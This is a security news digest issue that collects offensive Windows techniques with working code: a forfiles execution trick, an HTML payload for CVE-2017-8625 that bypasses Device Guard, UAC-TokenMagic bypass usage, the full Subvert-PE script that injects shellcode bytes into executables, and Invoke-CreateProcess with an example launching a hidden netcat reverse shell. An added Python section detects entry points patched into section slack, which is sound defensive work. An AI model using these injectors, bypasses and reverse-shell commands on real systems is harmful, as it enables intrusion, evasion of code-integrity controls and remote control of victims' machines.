Daily Security Digest and News -- Issue 2


Security Projects

Vulhub: one-click setup of vulnerability test environments
https://vulhub.org/#/index/

CVE-2017-11882
https://github.com/unamer/CVE-2017-11882/
 

1. Forfiles (launching calc.exe)

```cmd
forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe
```

https://technet.microsoft.com/zh-cn/library/cc753551(v=ws.10).aspx
 

Demonstration (screenshot in the original post).

 

2. CVE-2017-8625 - HTML / IE

```html
<html>
<body>
<script type="text/jscript">
var r = new ActiveXObject("Wscript.shell").Run("calc.exe");
</script>
</body>
</html>
```

Using CVE-2017-8625 to bypass Device Guard UMCI (User Mode Code Integrity)

https://msitpros.com/?p=3909


https://enigma0x3.net/2017/08/24/umci-vs-internet-explorer-exploring-cve-2017-8625/?utm_campaign=crowdfire&utm_content=crowdfire&utm_medium=social&utm_source=twitter#238993254-tw#1503674775121


Demonstration (screenshot in the original post).

 

3. UAC-TokenMagic.ps1: bypassing UAC

https://github.com/FuzzySecurity/PowerShell-Suite

References:

https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-1.html
https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-2.html
https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-3.html

```powershell
.EXAMPLE
C:\PS> UAC-TokenMagic -BinPath C:\Windows\System32\cmd.exe

.EXAMPLE
C:\PS> UAC-TokenMagic -BinPath C:\Windows\System32\cmd.exe -Args "/c calc.exe" -ProcPID 1116

.EXAMPLE
C:\PS> UAC-TokenMagic -BinPath C:\Windows\System32\cmd.exe -ProcPID 3624
```

Demonstration (screenshot in the original post).
 

4. Subvert-PE shellcode injection (PowerShell, launching calc.exe)

http://www.fuzzysecurity.com/scripts/18.html

Code

```powershell
function Subvert-PE {
<#
.SYNOPSIS
    Inject shellcode into a PE image while retaining the PE functionality.
    Author: Ruben Boonen (@FuzzySec)
    License: BSD 3-Clause
    Required Dependencies: None
    Optional Dependencies: None

.DESCRIPTION
    Parse a PE image, inject shellcode at the end of the code section and dynamically patch the entry point. After the shellcode executes, program execution is handed back over to the legitimate PE entry point.

.PARAMETER Path
    Path to portable executable.

.PARAMETER Write
    Inject shellcode and overwrite the PE. If omitted simply display "Entry Point", "Preferred Image Base" and dump the memory at the null-byte location.

.EXAMPLE
    C:\PS> Subvert-PE -Path C:\Path\To\PE.exe

.EXAMPLE
    C:\PS> Subvert-PE -Path C:\Path\To\PE.exe -Write

.LINK
    http://www.fuzzysecurity.com/
#>
    param (
        [Parameter(Mandatory = $True)]
        [string]$Path,
        [parameter(parametersetname="Write")]
        [switch]$Write
    )
    # Read File bytes
    $bytes = [System.IO.File]::ReadAllBytes($Path)

    New-Variable -Option Constant -Name Magic -Value @{
        "010b" = "PE32"
        "020b" = "PE32+"
    }

    # Function courtesy of @mattifestation
    function Local:ConvertTo-Int{
        Param(
            [Parameter(Position = 1, Mandatory = $True)]
            [Byte[]]
            $array)
        switch ($array.Length){
            # Convert to WORD & DWORD
            2 { Write-Output ( [UInt16] ('0x{0}' -f (($array | % {$_.ToString('X2')}) -join '')) ) }
            4 { Write-Output ( [Int32] ('0x{0}' -f (($array | % {$_.ToString('X2')}) -join '')) ) }
        }
    }

    # Offsets for calculations
    $PE = ConvertTo-Int $bytes[63..60]
    $NumOfPESection = ConvertTo-Int $bytes[($PE+7)..($PE+6)]
    $OptSize = ConvertTo-Int $bytes[($PE+21)..($PE+20)]
    $Opt = $PE + 24
    $SecTbl = $Opt + $OptSize

    # Entry point offset
    $EntryPointOffset = '{0:X8}' -f (ConvertTo-Int $bytes[($Opt+19)..($Opt+16)])
    # Duplicate for calculating JMP later
    $EntryPointBefore = ConvertTo-Int $bytes[($Opt+19)..($Opt+16)]
    echo "`nLegitimate Entry Point Offset: 0x$EntryPointOffset"

    # PE magic number
    $MagicVal = $Magic[('{0:X4}' -f (ConvertTo-Int $bytes[($Opt+1)..($Opt+0)]))]
    # Preferred ImageBase, based on $MagicVal --> PE32 (DWORD), PE32+ (QWORD)
    If($MagicVal -eq "PE32"){
        $ImageBase = '{0:X8}' -f (ConvertTo-Int $bytes[($Opt+31)..($Opt+28)])
    }
    ElseIf($MagicVal -eq "PE32+"){
        $QWORD = ( [UInt64] ('0x{0}' -f ((($bytes[($Opt+30)..($Opt+24)]) | % {$_.ToString('X2')}) -join '')) )
        $ImageBase = '{0:X16}' -f $QWORD
    }

    # Preferred Image Base
    echo "Preferred PE Image Base: 0x$ImageBase"

    # Grab "Virtual Size" and "Virtual Address" for the CODE section.
    $SecVirtualSize = ConvertTo-Int $bytes[($SecTbl+11)..($SecTbl+8)]
    $SecVirtualAddress = ConvertTo-Int $bytes[($SecTbl+15)..($SecTbl+12)]

    # Precise start of CODE null-byte section!
    $NullCount = '{0:X8}' -f ($SecVirtualSize + $SecVirtualAddress)

    # Offset in PE is different [$SecVirtualSize + $SecVirtualAddress - ($SecVirtualAddress - $SecPTRRawData)]
    $SecPTRRawData = ConvertTo-Int $bytes[($SecTbl+23)..($SecTbl+20)]
    $ShellCodeWrite = ($SecVirtualSize + $SecVirtualAddress - ($SecVirtualAddress - $SecPTRRawData))

    # Hexdump of null-byte padding (before)
    echo "`nNull-Byte Padding dump:"
    $output = ""
    $i = 0
    foreach ( $count in $bytes[$ShellCodeWrite..($ShellCodeWrite+503)] ) {
        # Start a new line every 16 bytes, then always emit the byte
        if (($i % 16) -eq 0){
            $output += "`n"
        }
        $output += "{0:X2} " -f $count
        $i++
    }
    echo "$output`n"

    # If -Write flag is set
    if($Write){

        # Set shellcode variable based on PE architecture
        If($MagicVal -eq "PE32"){
            # 32-bit Universal WinExe (+ restore registers) --> calc (by SkyLined)
            # Size: 76 bytes
            $ShellCode = @(0x60,0x31,0xD2,0x52,0x68,0x63,0x61,0x6C,0x63,
            0x54,0x59,0x52,0x51,0x64,0x8B,0x72,0x30,0x8B,0x76,0x0C,0x8B,
            0x76,0x0C,0xAD,0x8B,0x30,0x8B,0x7E,0x18,0x8B,0x5F,0x3C,0x8B,
            0x5C,0x1F,0x78,0x8B,0x74,0x1F,0x20,0x01,0xFE,0x8B,0x54,0x1F,
            0x24,0x0F,0xB7,0x2C,0x17,0x42,0x42,0xAD,0x81,0x3C,0x07,0x57,
            0x69,0x6E,0x45,0x75,0xF0,0x8B,0x74,0x1F,0x1C,0x01,0xFE,0x03,
            0x3C,0xAE,0xFF,0xD7,0x58,0x58,0x61)
        }
        ElseIf($MagicVal -eq "PE32+"){
            # 64-bit Universal WinExe (+ restore registers) --> calc (by SkyLined)
            # Size: 97 bytes
            $ShellCode = @(0x53,0x56,0x57,0x55,0x6A,0x60,0x5A,0x68,0x63,
            0x61,0x6C,0x63,0x54,0x59,0x48,0x29,0xD4,0x65,0x48,0x8B,0x32,
            0x48,0x8B,0x76,0x18,0x48,0x8B,0x76,0x10,0x48,0xAD,0x48,0x8B,
            0x30,0x48,0x8B,0x7E,0x30,0x03,0x57,0x3C,0x8B,0x5C,0x17,0x28,
            0x8B,0x74,0x1F,0x20,0x48,0x01,0xFE,0x8B,0x54,0x1F,0x24,0x0F,
            0xB7,0x2C,0x17,0x8D,0x52,0x02,0xAD,0x81,0x3C,0x07,0x57,0x69,
            0x6E,0x45,0x75,0xEF,0x8B,0x74,0x1F,0x1C,0x48,0x01,0xFE,0x8B,
            0x34,0xAE,0x48,0x01,0xF7,0x99,0xFF,0xD7,0x48,0x83,0xC4,0x68,
            0x5D,0x5F,0x5E,0x5B)
        }

        # Inject all the things!
        for($i=0; $i -lt $ShellCode.Length; $i++){
            $bytes[($ShellCodeWrite + $i)] = $ShellCode[$i]
        }

        # Set new Entry Point Offset --> $NullCount
        $bytes[($Opt+19)] = [byte]('0x' + $NullCount.Substring(0,2))
        $bytes[($Opt+18)] = [byte]('0x' + $NullCount.Substring(2,2))
        $bytes[($Opt+17)] = [byte]('0x' + $NullCount.Substring(4,2))
        $bytes[($Opt+16)] = [byte]('0x' + $NullCount.Substring(6,2))

        # Modified Entry Point
        $EntryPointOffset = '{0:X8}' -f (ConvertTo-Int $bytes[($Opt+19)..($Opt+16)])
        echo "Modified Entry Point Offset: 0x$EntryPointOffset"

        # Calculate & append farJMP
        $Distance = '{0:x}' -f ($EntryPointBefore - (ConvertTo-Int $bytes[($Opt+19)..($Opt+16)]) - $ShellCode.Length - 5)
        echo "Inject Far JMP: 0xe9$Distance"
        $bytes[($ShellCodeWrite + $ShellCode.Length)] = 0xE9
        $bytes[($ShellCodeWrite + $ShellCode.Length + 1)] = [byte]('0x' + $Distance.Substring(6,2))
        $bytes[($ShellCodeWrite + $ShellCode.Length + 2)] = [byte]('0x' + $Distance.Substring(4,2))
        $bytes[($ShellCodeWrite + $ShellCode.Length + 3)] = [byte]('0x' + $Distance.Substring(2,2))
        $bytes[($ShellCodeWrite + $ShellCode.Length + 4)] = [byte]('0x' + $Distance.Substring(0,2))

        # Hexdump of null-byte padding (after)
        echo "`nNull-Byte Padding After:"
        $output = ""
        $i = 0
        foreach ( $count in $bytes[$ShellCodeWrite..($ShellCodeWrite+503)] ) {
            # Start a new line every 16 bytes, then always emit the byte
            if (($i % 16) -eq 0){
                $output += "`n"
            }
            $output += "{0:X2} " -f $count
            $i++
        }
        echo "$output`n"

        [System.IO.File]::WriteAllBytes($Path, $bytes)
    }
}
```
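Subvert-PE works because the code section's VirtualSize is normally smaller than its file-aligned SizeOfRawData, which leaves null-byte slack at the end of the section, and because AddressOfEntryPoint is a single header field that can be re-pointed into that slack. The same header fields give a defender a cheap static check: an entry point that lands past a section's VirtualSize but still inside its raw data, or in no section at all, is exactly the artefact this kind of patching leaves behind. The Python below is an added example, not part of the original post or of FuzzySecurity's scripts. It reads the same offsets Subvert-PE reads (e_lfanew at 0x3C, NumberOfSections at PE+6, SizeOfOptionalHeader at PE+20, Magic at Opt+0, AddressOfEntryPoint at Opt+16, and VirtualSize/VirtualAddress/SizeOfRawData/PointerToRawData at +8/+12/+16/+20 of each section header) and classifies where the entry point falls. The function names and the minimal PE32 it inspects (`build_sample_pe32`) are this example's own constructions.

```python
"""Flag PE files whose AddressOfEntryPoint lands in section slack (added example)."""
import struct

IMAGE_SCN_MEM_EXECUTE = 0x20000000
PE32, PE32PLUS = 0x10B, 0x20B


def parse_pe(data: bytes) -> dict:
    """Return the header fields needed for the entry-point check (same offsets Subvert-PE uses)."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    pe = struct.unpack_from("<I", data, 0x3C)[0]          # e_lfanew
    if data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    num_sections = struct.unpack_from("<H", data, pe + 6)[0]
    opt_size = struct.unpack_from("<H", data, pe + 20)[0]
    opt = pe + 24
    magic = struct.unpack_from("<H", data, opt)[0]
    entry = struct.unpack_from("<I", data, opt + 16)[0]   # AddressOfEntryPoint (RVA)
    if magic == PE32:
        image_base = struct.unpack_from("<I", data, opt + 28)[0]
    elif magic == PE32PLUS:
        image_base = struct.unpack_from("<Q", data, opt + 24)[0]
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    sections = []
    sec_tbl = opt + opt_size
    for i in range(num_sections):
        s = sec_tbl + 40 * i
        name = data[s:s + 8].rstrip(b"\0").decode("ascii", "replace")
        vsize, va, raw_size, raw_ptr = struct.unpack_from("<IIII", data, s + 8)
        chars = struct.unpack_from("<I", data, s + 36)[0]
        sections.append(dict(name=name, virtual_size=vsize, virtual_address=va,
                             raw_size=raw_size, raw_ptr=raw_ptr, characteristics=chars))
    return dict(magic=magic, entry_point=entry, image_base=image_base, sections=sections)


def rva_to_file_offset(hdr: dict, rva: int) -> int:
    """File offset backing an RVA; for the slack start this equals VirtualSize + PointerToRawData."""
    for sec in hdr["sections"]:
        va = sec["virtual_address"]
        if va <= rva < va + max(sec["virtual_size"], sec["raw_size"]):
            return rva - va + sec["raw_ptr"]
    raise ValueError("RVA 0x%x is not backed by file data" % rva)


def classify_entry_point(data: bytes) -> str:
    """'ok'      entry RVA inside a section's VirtualSize
       'slack'   entry RVA past VirtualSize but inside the section's raw data (Subvert-PE pattern)
       'nonexec' entry inside a section that is not marked executable
       'outside' entry RVA covered by no section"""
    hdr = parse_pe(data)
    rva = hdr["entry_point"]
    for sec in hdr["sections"]:
        va = sec["virtual_address"]
        if va <= rva < va + max(sec["virtual_size"], sec["raw_size"]):
            if rva >= va + sec["virtual_size"]:
                return "slack"
            if not sec["characteristics"] & IMAGE_SCN_MEM_EXECUTE:
                return "nonexec"
            return "ok"
    return "outside"


def build_sample_pe32(entry_rva: int, executable: bool = True) -> bytes:
    """Constructed minimal PE32 (not a real binary): one .text section with
    VirtualAddress 0x1000, VirtualSize 0x100, SizeOfRawData 0x200 at file offset 0x200."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)                 # e_lfanew = 0x40
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0xE0, 0x102)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, PE32)                               # Magic
    struct.pack_into("<I", opt, 16, entry_rva)                         # AddressOfEntryPoint
    struct.pack_into("<I", opt, 28, 0x400000)                          # ImageBase
    sec = bytearray(40)
    sec[:5] = b".text"
    struct.pack_into("<IIII", sec, 8, 0x100, 0x1000, 0x200, 0x200)
    struct.pack_into("<I", sec, 36, 0x60000020 if executable else 0x40000040)
    headers = dos + coff + opt + bytes(sec)
    headers += b"\0" * (0x200 - len(headers))
    return headers + b"\xC3" * 0x100 + b"\0" * 0x100                   # code, then null slack


if __name__ == "__main__":
    for rva in (0x1000, 0x1100, 0x5000):
        sample = build_sample_pe32(rva)
        print("entry 0x%05X -> %s" % (rva, classify_entry_point(sample)))
```

Run on a genuine binary (`classify_entry_point(open(path, "rb").read())`), a result of `slack` is worth a closer look: the bytes at `rva_to_file_offset(hdr, hdr["entry_point"])` are where the payload would sit, and the original entry is reachable by following the trailing relative jump. Packers and some linkers can also place the entry past VirtualSize, so treat the classification as a triage signal rather than a verdict.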

Video demonstration (embedded in the original post).

5. Invoke-CreateProcess (PowerShell, launching calc.exe)

Code

```powershell
function Invoke-CreateProcess {
<#
.SYNOPSIS
    -Binary Full path of the module to be executed.

    -Args Arguments to pass to the module, e.g. "/c calc.exe". Defaults
    to $null if not specified.

    -CreationFlags Process creation flags:
        0x00000000 (NONE)
        0x00000001 (DEBUG_PROCESS)
        0x00000002 (DEBUG_ONLY_THIS_PROCESS)
        0x00000004 (CREATE_SUSPENDED)
        0x00000008 (DETACHED_PROCESS)
        0x00000010 (CREATE_NEW_CONSOLE)
        0x00000200 (CREATE_NEW_PROCESS_GROUP)
        0x00000400 (CREATE_UNICODE_ENVIRONMENT)
        0x00000800 (CREATE_SEPARATE_WOW_VDM)
        0x00001000 (CREATE_SHARED_WOW_VDM)
        0x00040000 (CREATE_PROTECTED_PROCESS)
        0x00080000 (EXTENDED_STARTUPINFO_PRESENT)
        0x01000000 (CREATE_BREAKAWAY_FROM_JOB)
        0x02000000 (CREATE_PRESERVE_CODE_AUTHZ_LEVEL)
        0x04000000 (CREATE_DEFAULT_ERROR_MODE)
        0x08000000 (CREATE_NO_WINDOW)

    -ShowWindow Window display flags:
        0x0000 (SW_HIDE)
        0x0001 (SW_SHOWNORMAL)
        0x0001 (SW_NORMAL)
        0x0002 (SW_SHOWMINIMIZED)
        0x0003 (SW_SHOWMAXIMIZED)
        0x0003 (SW_MAXIMIZE)
        0x0004 (SW_SHOWNOACTIVATE)
        0x0005 (SW_SHOW)
        0x0006 (SW_MINIMIZE)
        0x0007 (SW_SHOWMINNOACTIVE)
        0x0008 (SW_SHOWNA)
        0x0009 (SW_RESTORE)
        0x000A (SW_SHOWDEFAULT)
        0x000B (SW_FORCEMINIMIZE)
        0x000B (SW_MAX)

    -StartF Bitfield to influence window creation:
        0x00000001 (STARTF_USESHOWWINDOW)
        0x00000002 (STARTF_USESIZE)
        0x00000004 (STARTF_USEPOSITION)
        0x00000008 (STARTF_USECOUNTCHARS)
        0x00000010 (STARTF_USEFILLATTRIBUTE)
        0x00000020 (STARTF_RUNFULLSCREEN)
        0x00000040 (STARTF_FORCEONFEEDBACK)
        0x00000080 (STARTF_FORCEOFFFEEDBACK)
        0x00000100 (STARTF_USESTDHANDLES)

.DESCRIPTION
    Author: Ruben Boonen (@FuzzySec)
    License: BSD 3-Clause
    Required Dependencies: None
    Optional Dependencies: None

.EXAMPLE
    Start calc with NONE/SW_SHOWNORMAL/STARTF_USESHOWWINDOW
    C:\PS> Invoke-CreateProcess -Binary C:\Windows\System32\calc.exe -CreationFlags 0x0 -ShowWindow 0x1 -StartF 0x1

.EXAMPLE
    Start nc reverse shell with CREATE_NO_WINDOW/SW_HIDE/STARTF_USESHOWWINDOW
    C:\PS> Invoke-CreateProcess -Binary C:\Some\Path\nc.exe -Args "-nv 127.0.0.1 9988 -e C:\Windows\System32\cmd.exe" -CreationFlags 0x8000000 -ShowWindow 0x0 -StartF 0x1
#>
    param (
        [Parameter(Mandatory = $True)]
        [string]$Binary,
        [Parameter(Mandatory = $False)]
        [string]$Args=$null,
        [Parameter(Mandatory = $True)]
        [Int]$CreationFlags,
        [Parameter(Mandatory = $True)]
        [Int]$ShowWindow,
        [Parameter(Mandatory = $True)]
        [Int]$StartF
    )
    # Define all the structures for CreateProcess
    Add-Type -TypeDefinition @"
    using System;
    using System.Diagnostics;
    using System.Runtime.InteropServices;

    [StructLayout(LayoutKind.Sequential)]
    public struct PROCESS_INFORMATION
    {
        public IntPtr hProcess;
        public IntPtr hThread;
        public uint dwProcessId;
        public uint dwThreadId;
    }

    [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
    public struct STARTUPINFO
    {
        public uint cb;
        public string lpReserved;
        public string lpDesktop;
        public string lpTitle;
        public uint dwX;
        public uint dwY;
        public uint dwXSize;
        public uint dwYSize;
        public uint dwXCountChars;
        public uint dwYCountChars;
        public uint dwFillAttribute;
        public uint dwFlags;
        public short wShowWindow;
        public short cbReserved2;
        public IntPtr lpReserved2;
        public IntPtr hStdInput;
        public IntPtr hStdOutput;
        public IntPtr hStdError;
    }

    [StructLayout(LayoutKind.Sequential)]
    public struct SECURITY_ATTRIBUTES
    {
        public int length;
        public IntPtr lpSecurityDescriptor;
        public bool bInheritHandle;
    }

    public static class Kernel32
    {
        [DllImport("kernel32.dll", SetLastError=true)]
        public static extern bool CreateProcess(
            string lpApplicationName,
            string lpCommandLine,
            ref SECURITY_ATTRIBUTES lpProcessAttributes,
            ref SECURITY_ATTRIBUTES lpThreadAttributes,
            bool bInheritHandles,
            uint dwCreationFlags,
            IntPtr lpEnvironment,
            string lpCurrentDirectory,
            ref STARTUPINFO lpStartupInfo,
            out PROCESS_INFORMATION lpProcessInformation);
    }
"@

    # StartupInfo Struct
    $StartupInfo = New-Object STARTUPINFO
    $StartupInfo.dwFlags = $StartF # StartupInfo.dwFlag
    $StartupInfo.wShowWindow = $ShowWindow # StartupInfo.ShowWindow
    $StartupInfo.cb = [System.Runtime.InteropServices.Marshal]::SizeOf($StartupInfo) # Struct Size

    # ProcessInfo Struct
    $ProcessInfo = New-Object PROCESS_INFORMATION

    # SECURITY_ATTRIBUTES Struct (Process & Thread)
    $SecAttr = New-Object SECURITY_ATTRIBUTES
    $SecAttr.Length = [System.Runtime.InteropServices.Marshal]::SizeOf($SecAttr)

    # CreateProcess --> lpCurrentDirectory
    $GetCurrentPath = (Get-Item -Path ".\" -Verbose).FullName

    # Call CreateProcess
    [Kernel32]::CreateProcess($Binary, $Args, [ref] $SecAttr, [ref] $SecAttr, $false, $CreationFlags, [IntPtr]::Zero, $GetCurrentPath, [ref] $StartupInfo, [ref] $ProcessInfo) |out-null

    echo "`nProcess Information:"
    Get-Process -Id $ProcessInfo.dwProcessId |ft
}
```

Demonstration (screenshot in the original post).

Recommended technical blogs:

1. Google Project Zero team blog

https://googleprojectzero.blogspot.co.uk/

2. NetSPI blog

https://blog.netspi.com/

3. HTML5 Security Cheatsheet

https://html5sec.org/

4. Hunting in-memory .NET attacks

https://www.endgame.com/blog/technical-blog/hunting-memory-net-attacks

5.klion’s blog

https://klionsec.github.io/